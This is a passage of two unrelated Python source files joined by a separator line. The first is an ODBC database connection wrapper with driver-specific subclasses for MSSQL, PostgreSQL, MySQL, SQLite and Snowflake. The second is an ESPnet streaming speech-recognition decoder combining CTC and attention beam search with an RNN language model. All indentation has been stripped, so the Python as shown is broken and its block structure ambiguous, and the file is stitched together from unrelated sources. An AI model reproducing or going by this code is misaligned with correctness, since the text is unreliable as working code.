""" Hold the lock here since it gets assigned in execute
which can be called in a different thread """
with self._lock:
res = self._execution_status
return res
@property
def execution_err(self) -> str:
""" Last execution error: Cleared prior to every execution.
Hold the lock here since it gets assigned in execute
which can be called in a different thread """
with self._lock:
res = self._execution_err
return res
@property
def quotechar(self) -> str:
if self._quotechar is None:
self._quotechar = self.conn.get_info(
SQLGetInfo.SQL_IDENTIFIER_QUOTE_CHAR)
# pyodbc note
# self._quotechar = self.conn.getinfo(
return self._quotechar
@property
def search_escapechar(self) -> str:
if self._search_escapechar is None:
self._search_escapechar = self.conn.get_info(
SQLGetInfo.SQL_SEARCH_PATTERN_ESCAPE)
return self._search_escapechar
@property
def search_escapepattern(self) -> str:
if self._search_escapepattern is None:
# https://stackoverflow.com/questions/2428117/casting-raw-strings-python
self._search_escapepattern = \
(self.search_escapechar).encode("unicode-escape").decode() + "\\1"
return self._search_escapepattern
def sanitize_search_string(self, term) -> str:
if term is not None and len(term):
res = sub("(_|%)", self.search_escapepattern, term)
else:
res = term
return res
def connect(
self,
username: str = "",
password: str = "",
force: bool = False) -> None:
uid = username or self.username
pwd = password or self.password
conn_str = "DSN=" + self.dsn + ";"
if len(uid):
self.username = uid
conn_str = conn_str + "UID=" + uid + ";"
if len(pwd):
self.password = pwd
conn_str = conn_str + "PWD=" + pwd + ";"
if force or not self.conn.connected():
try:
self.conn = connect(dsn = conn_str, timeout = 5)
self.status = connStatus.IDLE
except ConnectError as e:
self.logger.error("Error while connecting: %s", str(e))
raise ConnectError(e)
def fetchmany(self, size, event: Event = None) -> list:
with self._lock:
if self.cursor:
self._fetch_res = self.cursor.fetchmany(size)
else:
self._fetch_res = []
if event is not None:
event.set()
return self._fetch_res
def async_fetchmany(self, size) -> list:
""" async_ is a misnomer here. It does execute fetch in a new thread
however it will also wait for execution to complete. At this time
this helps us with registering KeyboardInterrupt during cyanodbc.
fetchmany only; it may evolve to have more true async-like behavior.
"""
exec_event = Event()
t = Thread(
target = self.fetchmany,
kwargs = {"size": size, "event": exec_event},
daemon = True)
t.start()
# Will block but can be interrupted
exec_event.wait()
return self._fetch_res
def execute(self, query, parameters = None, event: Event = None) -> Cursor:
self.logger.debug("Execute: %s", query)
with self._lock:
self.close_cursor()
self.cursor = self.conn.cursor()
try:
self._execution_err = None
self.status = connStatus.EXECUTING
self.cursor.execute(query, parameters)
self.status = connStatus.IDLE
self._execution_status = executionStatus.OK
self.query = query
except DatabaseError as e:
self._execution_status = executionStatus.FAIL
self._execution_err = str(e)
self.logger.warning("Execution error: %s", str(e))
if event is not None:
event.set()
return self.cursor
def async_execute(self, query) -> Cursor:
""" async_ is a misnomer here. It does execute fetch in a new thread
however it will also wait for execution to complete. At this time
this helps us with registering KeyboardInterrupt during cyanodbc.
execute only; it may evolve to have more true async-like behavior.
"""
exec_event = Event()
t = Thread(
target = self.execute,
kwargs = {"query": query, "parameters": None, "event": exec_event},
daemon = True)
t.start()
# Will block but can be interrupted
exec_event.wait()
return self.cursor
def list_catalogs(self) -> list:
# pyodbc note
# return conn.cursor().tables(catalog = "%").fetchall()
res = []
try:
if self.conn.connected():
self.logger.debug("Calling list_catalogs...")
with self._lock:
res = self.conn.list_catalogs()
self.logger.debug("list_catalogs: done")
except DatabaseError as e:
self.status = connStatus.ERROR
self.logger.warning("list_catalogs: %s", str(e))
return res
def list_schemas(self, catalog = None) -> list:
res = []
# We only trust this generic implementation if attempting to list
# schemata in curent catalog (or catalog argument is None)
if catalog is not None and not catalog == self.current_catalog():
return res
try:
if self.conn.connected():
self.logger.debug("Calling list_schemas...")
with self._lock:
res = self.conn.list_schemas()
self.logger.debug("list_schemas: done")
except DatabaseError as e:
self.status = connStatus.ERROR
self.logger.warning("list_schemas: %s", str(e))
return res
def find_tables(
self,
catalog = "",
schema = "",
table = "",
type = "") -> list:
res = []
try:
if self.conn.connected():
self.logger.debug("Calling find_tables: %s, %s, %s, %s",
catalog, schema, table, type)
with self._lock:
res = self.conn.find_tables(
catalog = catalog,
schema = schema,
table = table,
type = type)
self.logger.debug("find_tables: done")
except DatabaseError as e:
self.logger.warning("find_tables: %s.%s.%s, type %s: %s", catalog, schema, table, type, str(e))
return res
def find_columns(
self,
catalog = "",
schema = "",
table = "",
column = "") -> list:
res = []
try:
if self.conn.connected():
self.logger.debug("Calling find_columns: %s, %s, %s, %s",
catalog, schema, table, column)
with self._lock:
res = self.conn.find_columns(
catalog = catalog,
schema = schema,
table = table,
column = column)
self.logger.debug("find_columns: done")
except DatabaseError as e:
self.logger.warning("find_columns: %s.%s.%s, column %s: %s", catalog, schema, table, column, str(e))
return res
def current_catalog(self) -> str:
if self.conn.connected():
return self.conn.catalog_name
return None
def connected(self) -> bool:
return self.conn.connected()
def catalog_support(self) -> bool:
res = self.conn.get_info(SQLGetInfo.SQL_CATALOG_NAME)
return res == True or res == 'Y'
# pyodbc note
# return self.conn.getinfo(pyodbc.SQL_CATALOG_NAME) == True or self.conn.getinfo(pyodbc.SQL_CATALOG_NAME) == 'Y'
def get_info(self, code: int) -> str:
return self.conn.get_info(code)
def close(self) -> None:
# TODO: When disconnecting
# We likely don't want to allow any exception to
# propagate. Catch DatabaseError?
if self.conn.connected():
self.conn.close()
def close_cursor(self) -> None:
if self.cursor:
self.cursor.close()
self.cursor = None
self.query = None
def cancel(self) -> None:
if self.cursor:
self.cursor.cancel()
self.query = None
def preview_query(self, table, filter_query = "", limit = -1) -> str:
qry = "SELECT * FROM " + table + " " + filter_query
if limit > 0:
qry = qry + " LIMIT " + str(limit)
return qry
def formatted_fetch(self, size, cols, format_name = "psql"):
while True:
res = self.async_fetchmany(size)
if len(res) < 1:
break
else:
yield "\n".join(
formatter.format_output(
res,
cols,
format_name = format_name))
connWrappers = {}
class MSSQL(sqlConnection):
def find_tables(
self,
catalog = "",
schema = "",
table = "",
type = "") -> list:
""" FreeTDS does not allow us to query catalog == '', and
schema = '' which, according to the ODBC spec for SQLTables should
return tables outside of any catalog/schema. In the case of FreeTDS
what gets passed to the sp_tables sproc is null, which in turn
is interpreted as a wildcard. For the time being intercept
these queries here (used in auto completion) and return empty
set. """
if catalog == "\x00" and schema == "\x00":
return []
return super().find_tables(
catalog = catalog,
schema = schema,
table = table,
type = type)
def list_schemas(self, catalog = None) -> list:
""" Optimization for listing out-of-database schemas by
always querying catalog.sys.schemas. """
res = []
qry = "SELECT name FROM {catalog}.sys.schemas " \
"WHERE name NOT IN ('db_owner', 'db_accessadmin', " \
"'db_securityadmin', 'db_ddladmin', 'db_backupoperator', " \
"'db_datareader', 'db_datawriter', 'db_denydatareader', " \
"'db_denydatawriter')"
if catalog is None and self.current_catalog():
catalog = self.sanitize_search_string(self.current_catalog())
if catalog:
try:
self.logger.debug("Calling list_schemas...")
crsr = self.execute(qry.format(catalog = catalog))
res = crsr.fetchall()
crsr.close()
self.logger.debug("Calling list_schemas: done")
schemas = [r[0] for r in res]
if len(schemas):
return schemas
except DatabaseError as e:
self.logger.warning("MSSQL list_schemas: %s", str(e))
return super().list_schemas(catalog = catalog)
def preview_query(
self,
table,
filter_query = "",
limit = -1) -> str:
qry = " * FROM " + table + " " + filter_query
if limit > 0:
qry = "SELECT TOP " + str(limit) + qry
else:
qry = "SELECT" + qry
return qry
class PSSQL(sqlConnection):
def find_tables(
self,
catalog = "",
schema = "",
table = "",
type = "") -> list:
""" At least the psql odbc driver I am using has an annoying habbit
of treating the catalog and schema fields interchangible, which
in turn screws up with completion"""
if not catalog in [self.current_catalog(), self.sanitize_search_string(self.current_catalog())]:
return []
return super().find_tables(
catalog = catalog,
schema = schema,
table = table,
type = type)
def find_columns(
self,
catalog = "",
schema = "",
table = "",
column = "") -> list:
""" At least the psql odbc driver I am using has an annoying habbit
of treating the catalog and schema fields interchangible, which
in turn screws up with completion"""
if not catalog in [self.current_catalog(), self.sanitize_search_string(self.current_catalog())]:
return []
return super().find_columns(
catalog = catalog,
schema = schema,
table = table,
column = column)
class MySQL(sqlConnection):
def list_schemas(self, catalog = None) -> list:
""" Only catalogs for MySQL, it seems,
however, list_schemas returns [""] which
causes blank entries to show up in auto
completion. Also confuses some of the checks we have
that look for len(list_schemas) < 1 to decide whether
to fall-back to find_tables. Make sure that for MySQL
we do, in-fact fall-back to find_tables"""
return []
def find_tables(
self,
catalog = "",
schema = "",
table = "",
type = "") -> list:
if catalog in ["", "null"] and schema not in ["", "null"]:
catalog = schema
schema = ""
return super().find_tables(
catalog = catalog,
schema = schema,
table = table,
type = type)
def find_columns(
self,
catalog = "",
schema = "",
table = "",
column = "") -> list:
if catalog in ["", "null"] and schema not in ["", "null"]:
catalog = schema
schema = ""
return super().find_columns(
catalog = catalog,
schema = schema,
table = table,
column = column)
class SQLite(sqlConnection):
def list_schemas(self, catalog = None) -> list:
"""Easy peasy"""
return []
def list_catalogs(self) -> list:
"""Easy peasy"""
return []
class Snowflake(sqlConnection):
def find_tables(
self,
catalog = "",
schema = "",
table = "",
type = "") -> list:
type = type.upper()
return super().find_tables(
catalog = catalog,
schema = schema,
table = table,
type = type)
connWrappers["MySQL"] = MySQL
connWrappers["Microsoft SQL Server"] = MSSQL
connWrappers["SQLite"] = SQLite
connWrappers["PostgreSQL"] = PSSQL
connWrappers["Snowflake"] = Snowflake
|
"""
Copyright (c) 2021, salesforce.com, inc.
All rights reserved.
SPDX-License-Identifier: BSD-3-Clause
For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
"""
from argparse import Namespace
import logging
import torch
import json
import numpy
import math
from espnet.nets.pytorch_backend.transformer.subsampling import _context_concat
from speech_datasets import SpeechDataLoader
from espnet.nets.asr_interface import ASRInterface
from espnet.utils.deterministic_utils import set_deterministic_pytorch
from espnet.asr.pytorch_backend.asr_init import load_trained_model
from espnet.asr.asr_utils import get_model_conf
import espnet.nets.pytorch_backend.lm.default as lm_pytorch
from espnet.asr.asr_utils import torch_load
from espnet.asr.asr_utils import add_results_to_json
from espnet.asr.pytorch_backend.asr_dsl import _recursive_to, CustomConverter
NEG_INF = - 999999999.9
def recog(args):
"""Decode with the given args.
Args:
args (namespace): The program arguments.
"""
set_deterministic_pytorch(args)
# Weiran: the model shall be trained with certain left context and right context.
model, train_args = load_trained_model(args.model)
assert isinstance(model, ASRInterface)
model.recog_args = args
# read rnnlm
if args.rnnlm:
rnnlm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)
if getattr(rnnlm_args, "model_module", "default") != "default":
raise ValueError("use '--api v2' option to decode with non-default language model")
rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(len(train_args.char_list), rnnlm_args.layer, rnnlm_args.unit))
torch_load(args.rnnlm, rnnlm)
rnnlm.eval()
else:
rnnlm = None
# Read truth file.
if args.truth_file:
with open(args.truth_file, "r") as fin:
retval = fin.read().rstrip('\n')
dict_truth = dict([(l.split()[0], " ".join(l.split()[1:])) for l in retval.split("\n")])
"""
# gpu
if args.ngpu == 1:
gpu_id = list(range(args.ngpu))
logging.info('gpu id: ' + str(gpu_id))
model.cuda()
if rnnlm:
rnnlm.cuda()
"""
new_js = {}
recog_converter = CustomConverter(input_context=args.input_context, input_skiprate=args.input_skiprate,
mode="eval", dtype=torch.float32)
recog_data = list(filter(lambda s: len(s) > 0, map(lambda s: s.strip(), args.recog_sets.split(","))))
recog_loader = SpeechDataLoader(recog_data, task="asr", shuffle=False,
precomputed_feats_type=args.precomputed_feats_type,
batch_size=1, spmodel=args.spmodel, token_list=train_args.char_list,
transform_conf=args.preprocess_conf, train=False, num_workers=args.loader_num_worker,
data_cache_mb=args.loader_cache_mb, num_replicas=args.num_replicas, rank=args.jobid-1,
ensure_equal_parts=False, text_filename=args.text_filename)
with torch.no_grad():
idx = 0
for batch in recog_loader:
idx += 1
name = batch[0]['uttid']
logging.info('(%d/%d) decoding ' + name, idx, len(recog_loader))
feat = _recursive_to(recog_converter(batch), device=torch.device('cpu'))[0]
feat = feat[0]
if args.truth_file and name in dict_truth:
truth_text = dict_truth[name]
else:
truth_text = ""
nbest_hyps = recognize_online(model, feat, args, train_args.char_list, rnnlm, truth_text=truth_text, blankidx=0)
# Weiran: prepare dict in order to add decoding results. Skipped the input and shape information.
gt_tokens = [int(_) for _ in batch[0]["labels"]]
tmp_dict = {"output": [{"name": "target1", "text": batch[0]["text"],
"tokenid": " ".join([str(_) for _ in gt_tokens]).strip(),
"token": " ".join([train_args.char_list[_] for _ in gt_tokens]).strip()}],
"utt2spk": batch[0]["speaker"]}
# Weiran: I am adding text in words in the result json.
new_js[name] = add_results_to_json(tmp_dict, nbest_hyps, train_args.char_list, copy_times=True)
with open(args.result_label, 'wb') as f:
f.write(json.dumps({'utts': new_js}, indent=4, ensure_ascii=False, sort_keys=True).encode('utf_8'))
def logsumexp(*args):
"""
Stable log sum exp.
"""
if all(a == NEG_INF for a in args):
return NEG_INF
a_max = max(args)
lsp = math.log(sum(math.exp(a - a_max) for a in args))
return a_max + lsp
def recognize_online(model, input, recog_args, char_list, rnnlm=None, truth_text="", blankidx=0):
"""Recognize input speech.
:param model: the trained hybrid att+CTC model.
:param ndnarray input: input acoustic feature (T, D)
:param Namespace recog_args: argument Namespace containing options
:param list char_list: list of characters
:param int blankidx: the index of the CTC <blank> symbol
:param torch.nn.Module rnnlm: language model module
:param string truth_text: ground truth text for the utterance
:return: N-best decoding results
:rtype: list
"""
# Assuming this is a streaming-compliant encoder.
enc_output = model.encode(input).unsqueeze(0)
# Use ctc beams to obtain timing for attention model.
lpz = model.ctc.log_softmax(enc_output)
lpz = lpz.detach().numpy().squeeze(0)
# Max time.
T = lpz.shape[0]
S = lpz.shape[1]
logging.info('input lengths: %s' % T)
logging.info('vocab size: %s' % S)
if truth_text:
logging.info("Ground truth in words:")
logging.info(truth_text)
# Search parameters.
beam_size = recog_args.beam_size
penalty = recog_args.penalty
ctc_weight = recog_args.ctc_weight
ctc_max_active = recog_args.streaming_ctc_maxactive
blank_offset = recog_args.streaming_ctc_blank_offset
# Some new search parameters not existing in offline decoding.
beam_width = recog_args.streaming_beam_width
# att_delay is the estimate of attention span of each output token.
# att_delay can be set to the value used for CTC-triggered attention training.
att_delay = recog_args.streaming_att_delay
# Weiran: I am now allowing some bounded delay for decoder, this could be different from att_delay.
dec_delay = recog_args.streaming_dec_delay
# The initial CTC-prefix search phase uses a larger beamsize.
ctc_scoring_ratio = recog_args.streaming_scoring_ratio
# Prepare sos and eos.
eos_idx = model.eos
y = model.sos
vy = enc_output.new_zeros(1).long()
vy[0] = y
# Initialize CTC hypothesis.
rnnlm_state, rnnlm_scores = rnnlm.predict(None, vy)
rnn_num_layers = len(rnnlm_state['c'])
rnnlm_scores = rnnlm_scores.squeeze(0).numpy()
# ctc_scores are probabilities of prefix ending with blank and non_blank.
# prev_score tracks the score right before a new token is added.
hyp_ctc = {'ctc_scores': (0.0, NEG_INF), 'prev_score': 0.0,
'accum_lmscore': 0.0, 'rnnlm_state': rnnlm_state, 'rnnlm_scores': rnnlm_scores, 'ctc_times': [-1]}
# Initialize att hypothesis.
# The name cache is consistent with that for attention layers.
hyp_att = {'att_score': 0.0, 'att_score_last': 0.0, 'cache': None, 'att_times': [-1]}
# We will maintain two set of hypothesis, for the att and ctc model respectively.
# Use dict for hypothesis sets so that it is efficient to determine certain hypo appears in each set.
hyps_ctc = dict()
hyps_att = dict()
# There is only one partial hypothesis for now.
l = tuple([model.sos])
hyps_ctc[l] = hyp_ctc
hyps_att[l] = hyp_att
# Perform frame synchronous decoding for CTC. t is index for frame.
for t in range(T): # Loop over time.
logging.debug("\n")
logging.debug("=" * 80)
logging.debug("CTC beam search at frame %d ..." % t)
hyps_new = dict()
# CTC-PREFIX beam search.
# Logic is mostly taken from https://gist.github.com/awni/56369a90d03953e370f3964c826ed4b0
active_set = numpy.argpartition(lpz[t], -ctc_max_active)[-ctc_max_active:]
for s in active_set:
p = lpz[t, s]
# logging.debug("logprob for token %d (%s): %f" % (s, char_list[s], p))
for l in hyps_ctc:
p_b, p_nb = hyps_ctc[l]['ctc_scores']
prev_score = hyps_ctc[l]['prev_score']
rnnlm_state = hyps_ctc[l]['rnnlm_state']
rnnlm_scores = hyps_ctc[l]['rnnlm_scores']
accum_lmscore = hyps_ctc[l]['accum_lmscore']
ctc_times = hyps_ctc[l]['ctc_times']
if s==blankidx: # blank. Not outputing new token.
p = p + blank_offset
if l in hyps_new:
p_b_new, p_nb_new = hyps_new[l]['ctc_scores']
else:
p_b_new, p_nb_new = NEG_INF, NEG_INF
# Only the probability of ending in blank gets updated.
ctc_scores_new = (logsumexp(p_b_new, p_b + p, p_nb + p), p_nb_new)
hyps_new[l] = {'ctc_scores': ctc_scores_new, 'prev_score': prev_score,
'accum_lmscore': accum_lmscore,
'rnnlm_state': rnnlm_state, 'rnnlm_token': -1, 'rnnlm_scores': rnnlm_scores,
'ctc_times': list(ctc_times)}
else:
if s == l[-1]:
# CTC does not model the acoustic scores of <sos> and <eos>.
# I doubt this can happen when active_set does not contain everything.
if len(l)==1:
continue
# Choice 1: Not outputing new token.
if l in hyps_new:
p_b_new, p_nb_new = hyps_new[l]['ctc_scores']
else:
p_b_new, p_nb_new = NEG_INF, NEG_INF
ctc_scores_new = (p_b_new, logsumexp(p_nb_new, p_nb + p))
hyps_new[l] = {'ctc_scores': ctc_scores_new, 'prev_score': prev_score,
'accum_lmscore': accum_lmscore,
'rnnlm_state': rnnlm_state, 'rnnlm_token': -1, 'rnnlm_scores': rnnlm_scores,
'ctc_times': list(ctc_times)}
# Choice 2: Outputing new token.
newl = l + (s,)
if newl in hyps_new:
p_b_new, p_nb_new = hyps_new[newl]['ctc_scores']
ctc_times = list(hyps_new[newl]['ctc_times'])
else:
p_b_new, p_nb_new = NEG_INF, NEG_INF
ctc_times = ctc_times + [t]
ctc_scores_new = (p_b_new, logsumexp(p_nb_new, p_b + p))
hyps_new[newl] = {'ctc_scores': ctc_scores_new, 'prev_score': logsumexp(p_b, p_nb),
'accum_lmscore': accum_lmscore + rnnlm_scores[s],
'rnnlm_state': rnnlm_state, 'rnnlm_token': s, 'rnnlm_scores': rnnlm_scores,
'ctc_times': ctc_times}
else:
# Must output new token.
newl = l + (s,)
if newl in hyps_new:
p_b_new, p_nb_new = hyps_new[newl]['ctc_scores']
ctc_times = list(hyps_new[newl]['ctc_times'])
else:
p_b_new, p_nb_new = NEG_INF, NEG_INF
ctc_times = ctc_times + [t]
ctc_scores_new = (p_b_new, logsumexp(p_nb_new, p_b + p, p_nb + p))
hyps_new[newl] = {'ctc_scores': ctc_scores_new, 'prev_score': logsumexp(p_b, p_nb),
'accum_lmscore': accum_lmscore + rnnlm_scores[s],
'rnnlm_state': rnnlm_state, 'rnnlm_token': s, 'rnnlm_scores': rnnlm_scores,
'ctc_times': ctc_times}
# End of loop over active set.
# End of loop over hyps.
# Sort and trim the beams for one time step.
# First dictionary to list.
hyps_list = [(k, hyps_new[k]) for k in hyps_new]
del hyps_new
# Check the equation for computing total score for pruning.
hyps_list = sorted(hyps_list,
key=lambda x: logsumexp(*x[1]['ctc_scores']) + recog_args.lm_weight * x[1]['accum_lmscore'] + penalty * (len(x[0])-1),
reverse=True)[:(beam_size * ctc_scoring_ratio)]
# Get total score for top beam.
score_thres = \
logsumexp(*hyps_list[0][1]['ctc_scores']) + recog_args.lm_weight * hyps_list[0][1]['accum_lmscore'] + penalty * (len(hyps_list[0][0])-1)
# Remove hyps whose total score is below that of top beam by beam_width.
hyps_list = list(filter(lambda x: score_thres-beam_width <=
logsumexp(*x[1]['ctc_scores']) + recog_args.lm_weight * x[1]['accum_lmscore'] + penalty * (len(x[0])-1), hyps_list))
# Back up the top beams for JOINT. Note that we do not have ctc_scoring_ratio here.
ctc_top_keys = set([k for (k, v) in hyps_list[:min(len(hyps_list), beam_size)]])
# Batch-update the rnnlm_state and rnnlm_scores for hyps whose rnnlm_token are non-negative.
tokens_to_update = [v['rnnlm_token'] for (k, v) in hyps_list if v['rnnlm_token']>=0]
if tokens_to_update:
# Each rnnlm_state is a dict, so this is a list of dict.
# Each dict has 'c' and 'h', each state is a list of tensors over layers.
states_to_update = [v['rnnlm_state'] for (k, v) in hyps_list if v['rnnlm_token'] >= 0]
tmp_states = dict()
# First group samples, then group layers.
tmp_states['c'] = [torch.cat([ss['c'][i] for ss in states_to_update], 0) for i in range(rnn_num_layers)]
tmp_states['h'] = [torch.cat([ss['h'][i] for ss in states_to_update], 0) for i in range(rnn_num_layers)]
logging.debug("\nForwarding rnnlm of %d samples" % len(tokens_to_update))
new_rnnlm_states, new_rnnlm_scores = rnnlm.predict(tmp_states, torch.tensor(tokens_to_update).long())
hyps_ctc = dict()
tmp_count = 0
for k, v in hyps_list:
if v['rnnlm_token'] >= 0:
v['rnnlm_state'] = {'c': [new_rnnlm_states['c'][i][tmp_count, :].unsqueeze(0) for i in range(rnn_num_layers)],
'h': [new_rnnlm_states['h'][i][tmp_count, :].unsqueeze(0) for i in range(rnn_num_layers)]}
v['rnnlm_scores'] = new_rnnlm_scores[tmp_count, :].cpu()
tmp_count += 1
v.pop('rnnlm_token', None)
hyps_ctc[k] = v
logging.debug("\nFrame %d, CTCPrefix finished ..." % t)
for l in list(hyps_ctc.keys())[:min(10, len(hyps_ctc))]:
logging.debug("hyp: [%s], total score: %f" % ("".join([char_list[x] for x in l]),
logsumexp(*hyps_ctc[l]['ctc_scores']) + recog_args.lm_weight * hyps_ctc[l]['accum_lmscore'] + penalty * (len(l)-1)))
# Weiran: this is the DCOND step in the paper.
ys = []
tokens_to_update = []
caches = []
for l in hyps_ctc:
if len(l)>1:
c = l[-1]
ctc_time = hyps_ctc[l]['ctc_times'][-1]
if t - ctc_time > 2 and lpz[t, c] > math.log(0.01) > max(lpz[ctc_time+1, c], lpz[ctc_time+2, c]):
# Weiran: I am also updating the ctc_times.
logging.debug("for hyp [%s], changing ctc_time from %d to %d" %
("".join([char_list[x] for x in l]), ctc_time, t))
hyps_ctc[l]['ctc_times'][-1] = t
if l in hyps_att: # and hyps_att[l]['att_times'][-1] < t-2:
ys.append(l[:-1])
tokens_to_update.append(c)
caches.append([ca[:-1,:] for ca in hyps_att[l]['cache']])
num_to_update = len(ys)
if num_to_update > 0:
logging.debug("Adjusting %d att hyps ..." % num_to_update)
# Memory up to frame t.
hs_pad = enc_output[:, :min(t+1+dec_delay, T), :].repeat([num_to_update, 1, 1])
local_att_scores, new_caches = model.decoder.batch_forward_one_step_with_cache(ys, caches, hs_pad, None)
local_att_scores = local_att_scores.numpy()
for i in range(num_to_update):
l = ys[i] + (tokens_to_update[i],)
logging.debug("Attention: Appending %s to [%s]" %
(char_list[tokens_to_update[i]], " ".join([char_list[_] for _ in ys[i]])))
logging.debug("att_score_last changes from %f to %f" %
(hyps_att[l]['att_score_last'], local_att_scores[i, tokens_to_update[i]]))
hyps_att[l]['att_score'] = hyps_att[l]['att_score'] - hyps_att[l]['att_score_last'] + local_att_scores[i, tokens_to_update[i]]
hyps_att[l]['att_score_last'] = local_att_scores[i, tokens_to_update[i]]
hyps_att[l]['cache'] = new_caches[i]
hyps_att[l]['att_times'][-1] = min(t+dec_delay, T-1)
# If some ctc new hyps can be premature, the actual time delay can be too short??
logging.debug("Computing attention scores finished ...")
del new_caches
logging.debug("\n")
# Compute attention scores, which lags behind CTC by at most 1 token.
logging.debug("\n")
logging.debug("<" * 40)
logging.debug("Attention pass I: checking hypothesis ...")
ys = []
tokens_to_update = []
caches = []
for l in hyps_ctc:
if l not in hyps_att:
# logging.debug("Attention: Considering augmenting the hyp: [%s]" % " ".join([char_list[_] for _ in l]))
oldl = l[:-1]
if oldl in hyps_att:
c = l[-1]
ctc_time = hyps_ctc[l]['ctc_times'][-1]
# If it has been sufficient number of frames since CTC added the token c.
if t + dec_delay - ctc_time >= att_delay:
assert t + dec_delay - ctc_time == att_delay, "weird timing !"
logging.debug("Attention: Will append %s to [%s]" %
(char_list[c], " ".join([char_list[_] for _ in oldl])))
logging.debug("Attention: Perfect delay %d (current t=%d, ctc_time=%d)" % (att_delay, t, ctc_time))
ys.append(oldl)
tokens_to_update.append(c)
caches.append(hyps_att[oldl]['cache'])
else:
# logging.debug("Attention: But not augmenting due to insufficient context!")
pass
else:
oldoldl = l[:-2]
c = l[-2]
assert oldoldl in hyps_att, "att hyp lagging by more than TWO step!!!"
att_time = hyps_att[oldoldl]['att_times'][-1]
logging.debug("\nAttention: Hyp lagging by two steps!")
logging.debug("Attention: Will add %s to [%s], in order to catch [%s]" %
(char_list[c], " ".join([char_list[_] for _ in oldoldl]), " ".join([char_list[_] for _ in l]) ))
logging.debug("Attention: current t=%d, att_time=%d, ctc_time=%d, while att_delay=%d" %
(t, att_time, hyps_ctc[l]['ctc_times'][-1], att_delay))
ys.append(oldoldl)
tokens_to_update.append(c)
caches.append(hyps_att[oldoldl]['cache'])
# Weiran: one thing we could do to reduce computation is to collect those unique ys.
logging.debug("\n")
logging.debug("#" * 40)
num_to_update = len(ys)
logging.debug("Forwarding %d attention hyps ..." % num_to_update)
if num_to_update > 0:
# Memory up to frame t.
hs_pad = enc_output[:, :min(t+1+dec_delay, T), :].repeat([num_to_update, 1, 1])
local_att_scores, new_caches = model.decoder.batch_forward_one_step_with_cache(ys, caches, hs_pad, None)
local_att_scores = local_att_scores.numpy()
for i in range(num_to_update):
oldl = ys[i]
newl = ys[i] + (tokens_to_update[i],)
newdict = dict()
logging.debug("Attention: Appending %s to [%s], add to att score %s" %
(char_list[tokens_to_update[i]], " ".join([char_list[_] for _ in oldl]),
local_att_scores[i, tokens_to_update[i]]))
newdict['att_score'] = hyps_att[oldl]['att_score'] + local_att_scores[i, tokens_to_update[i]]
newdict['att_score_last'] = local_att_scores[i, tokens_to_update[i]]
newdict['att_times'] = hyps_att[oldl]['att_times'] + [min(t+dec_delay, T-1)]
newdict['cache'] = new_caches[i]
hyps_att[newl] = newdict
# If some ctc new hyps can be premature, the actual time delay can be too short??
logging.debug("Computing attention scores finished ...")
del new_caches
logging.debug("\n")
# Obtain joint score.
if not t==T-1:
logging.debug(">" * 40)
joint_hyps = []
for l in hyps_ctc:
total_score = recog_args.lm_weight * hyps_ctc[l]['accum_lmscore'] + penalty * (len(l) - 1)
ctc_score = logsumexp(*hyps_ctc[l]['ctc_scores'])
# Weiran: my implementation of combined score.
if l in hyps_att:
att_score = hyps_att[l]['att_score']
total_score += ctc_weight * ctc_score + (1 - ctc_weight) * att_score
else:
att_score = hyps_att[l[:-1]]['att_score']
total_score += ctc_weight * hyps_ctc[l]['prev_score'] + (1 - ctc_weight) * att_score + (ctc_score - hyps_ctc[l]['prev_score'])
"""
# The choice in MERL paper.
if l in hyps_att:
att_score = hyps_att[l]['att_score']
else:
att_score = hyps_att[l[:-1]]['att_score']
total_score += ctc_weight * ctc_score + (1 - ctc_weight) * att_score
"""
joint_hyps.append((l, total_score))
joint_hyps = dict(sorted(joint_hyps, key=lambda x: x[1], reverse=True)[:beam_size])
logging.debug("JOINT hyps ...")
for l in list(joint_hyps.keys())[:min(10, len(joint_hyps))]:
logging.debug("hyp: [%s], total score: %f" % ("".join([char_list[x] for x in l]), joint_hyps[l]))
# Prune again the CTC hyps.
final_ctc_keys = ctc_top_keys.union(set(joint_hyps.keys()))
del joint_hyps
# Clean dictionaries.
for l in list(hyps_ctc.keys()):
if l not in final_ctc_keys:
# logging.debug("Removing hypo [%s] from hyps_ctc" % " ".join([char_list[_] for _ in l]))
hyps_ctc.pop(l)
final_att_keys = set([l[:-1] for l in final_ctc_keys]).union(final_ctc_keys)
for l in list(hyps_att.keys()):
if l not in final_att_keys:
# logging.debug("Removing hypo [%s] from hyps_ctc" % " ".join([char_list[_] for _ in l]))
hyps_att.pop(l)
# Finished loop over time.
# FINAL STAGES.
logging.debug("*" * 80)
logging.debug("CTC finished all %d frames ..." % T)
logging.debug("\n")
logging.debug("Attention: Clear one-step delays ...")
ys = []
tokens_to_update = []
caches = []
t = T - 1
for l in hyps_ctc:
if l not in hyps_att:
oldl = l[:-1]
assert oldl in hyps_att, "att can not be lagging by more than ONE step!!!"
c = l[-1]
ctc_time = hyps_ctc[l]['ctc_times'][-1]
# Even if there is not sufficient number of frames since CTC added the token c.
logging.debug("Attention: Will append %s to [%s]" %
(char_list[c], " ".join([char_list[_] for _ in oldl])))
logging.debug("Attention: Actual delay %d (current t=%d, ctc_time=%d)" % (t-ctc_time, t, ctc_time))
ys.append(oldl)
tokens_to_update.append(c)
caches.append(hyps_att[oldl]['cache'])
# Weiran: one thing we could do to reduce computation is to collect those unique ys.
num_to_update = len(ys)
logging.debug("Forwarding %d attention hyps ..." % num_to_update)
if num_to_update > 0:
hs_pad = enc_output[:, :(t + 1), :].repeat([num_to_update, 1, 1])
local_att_scores, new_caches = model.decoder.batch_forward_one_step_with_cache(ys, caches, hs_pad, None)
local_att_scores = local_att_scores.numpy()
for i in range(num_to_update):
oldl = ys[i]
newl = ys[i] + (tokens_to_update[i],)
newdict = dict()
logging.debug("Attention: Appending %s to [%s], add to att score %f" %
(char_list[tokens_to_update[i]], " ".join([char_list[_] for _ in oldl]),
local_att_scores[i, tokens_to_update[i]]))
newdict['att_score'] = hyps_att[oldl]['att_score'] + local_att_scores[i, tokens_to_update[i]]
newdict['att_score_last'] = local_att_scores[i, tokens_to_update[i]]
newdict['att_times'] = hyps_att[oldl]['att_times'] + [t]
newdict['cache'] = new_caches[i]
hyps_att[newl] = newdict
# If some ctc new hyps can be premature, the actual time delay can be too short.
del new_caches
logging.debug("Computing attention scores finished ...")
# Final final step.
logging.debug("\nCTC rnnlm_scores update with <eos> ...")
for l in hyps_ctc:
hyps_ctc[l]['accum_lmscore'] = hyps_ctc[l]['accum_lmscore'] + hyps_ctc[l]['rnnlm_scores'][eos_idx]
